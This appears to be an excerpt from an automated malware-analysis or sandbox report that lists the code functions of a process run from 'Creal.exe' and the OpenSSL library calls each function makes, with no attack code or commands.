              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2155A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF2155A
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,5_2_00007FFD8AF21582
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF219E7 CRYPTO_free,5_2_00007FFD8AF219E7
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF21483
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF37A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,5_2_00007FFD8AF37A60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF83A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,5_2_00007FFD8AF83A60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF69A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,5_2_00007FFD8AF69A60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4FAF0 CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,5_2_00007FFD8AF4FAF0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6FB00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF6FB00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF71970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,5_2_00007FFD8AF71970
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,5_2_00007FFD8AF2105F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6D980 RAND_bytes_ex,CRYPTO_malloc,memset,5_2_00007FFD8AF6D980
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF211DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,5_2_00007FFD8AF211DB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF21A41
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF63A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF63A00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,5_2_00007FFD8AF21A15
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8BA20 CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF8BA20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF39870 CRYPTO_free,CRYPTO_strdup,5_2_00007FFD8AF39870
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2589C BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,5_2_00007FFD8AF2589C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF538C0 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF538C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF213DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF213DE
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21654 EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_PKEY_get_id,ERR_new,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,EVP_DigestVerify,ERR_new,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,5_2_00007FFD8AF21654
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9B900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF9B900
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,5_2_00007FFD8AF2F910
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21E6A ERR_new,ERR_set_debug,CRYPTO_clear_free,5_2_00007FFD8AF21E6A
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,5_2_00007FFD8AF21B18
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2DFB5 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF2DFB5
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21019 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF21019
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2202C CRYPTO_free,5_2_00007FFD8AF2202C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF46030 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF46030
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF223EC CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF223EC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF225DB CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,5_2_00007FFD8AF225DB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,5_2_00007FFD8AF2150F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22720 CRYPTO_free,CRYPTO_strdup,5_2_00007FFD8AF22720
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2107D CRYPTO_free,5_2_00007FFD8AF2107D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF23EB0 CRYPTO_free,5_2_00007FFD8AF23EB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22680 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,5_2_00007FFD8AF22680
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF25EE0 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,5_2_00007FFD8AF25EE0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF35F20 CRYPTO_THREAD_run_once,5_2_00007FFD8AF35F20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,5_2_00007FFD8AF21C53
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF3BF30 CRYPTO_memcmp,5_2_00007FFD8AF3BF30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF83F30 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,5_2_00007FFD8AF83F30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8DF40 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,5_2_00007FFD8AF8DF40
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21D89 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF21D89
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22310 ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,5_2_00007FFD8AF22310
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF45E10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF45E10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2108C ERR_new,ERR_set_debug,CRYPTO_free,5_2_00007FFD8AF2108C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8BE20 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF8BE20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF25C9B CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,5_2_00007FFD8AF25C9B
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF35CB0 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,5_2_00007FFD8AF35CB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF33CC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF33CC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF223F1 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF223F1
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22595 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF22595
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF45D20 CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF45D20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,5_2_00007FFD8AF21CEE
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF83D20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,5_2_00007FFD8AF83D20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2D3CA CRYPTO_free,5_2_00007FFD8AF2D3CA
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21997 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,5_2_00007FFD8AF21997
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9B430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,5_2_00007FFD8AF9B430
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21444 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,5_2_00007FFD8AF21444
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21F8C CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,5_2_00007FFD8AF21F8C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF93260 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF93260
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2195B CRYPTO_zalloc,EVP_MAC_free,EVP_MAC_CTX_free,CRYPTO_free,5_2_00007FFD8AF2195B
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,5_2_00007FFD8AF21A32
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF592E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF592E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2111D CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,5_2_00007FFD8AF2111D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2B300 CRYPTO_clear_free,5_2_00007FFD8AF2B300
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF217F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF217F8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21677 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,5_2_00007FFD8AF21677
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2F160 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF2F160
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF81170 ERR_new,ERR_set_debug,CRYPTO_clear_free,5_2_00007FFD8AF81170
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4D170 CRYPTO_THREAD_write_lock,OPENSSL_sk_new_null,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,5_2_00007FFD8AF4D170
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A23 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,5_2_00007FFD8AF21A23
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2D227 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF2D227
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF87230 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,5_2_00007FFD8AF87230
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF21B90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21262 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,5_2_00007FFD8AF21262
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF85070 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF85070
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4F070 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,memcpy,5_2_00007FFD8AF4F070
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9B070 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF9B070
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF49080 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,5_2_00007FFD8AF49080
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF214CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF214CE
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF630A0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,5_2_00007FFD8AF630A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF221DF CRYPTO_memcmp,5_2_00007FFD8AF221DF
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22374 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF22374
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF550D8 EVP_MAC_CTX_free,CRYPTO_free,5_2_00007FFD8AF550D8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF69120 CRYPTO_malloc,ERR_new,ERR_set_debug,5_2_00007FFD8AF69120
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF211A9 EVP_MAC_CTX_free,CRYPTO_free,5_2_00007FFD8AF211A9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF211BD CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF211BD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF817A1 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF817A1
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF777A0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF777A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,5_2_00007FFD8AF21087
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF957FE CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF957FE
